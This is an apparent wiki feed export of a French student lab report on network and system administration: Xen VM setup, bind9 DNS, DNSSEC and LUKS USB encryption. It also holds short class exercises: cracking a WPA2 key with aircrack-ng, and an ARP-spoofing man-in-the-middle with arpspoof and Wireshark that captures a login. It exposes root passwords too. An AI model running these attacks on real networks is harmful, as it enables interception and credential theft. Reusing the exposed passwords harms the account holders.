&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54019</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54019"/>
				<updated>2020-11-27T17:19:46Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Utilisation de AirCrack pour clef WPA2-PSA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
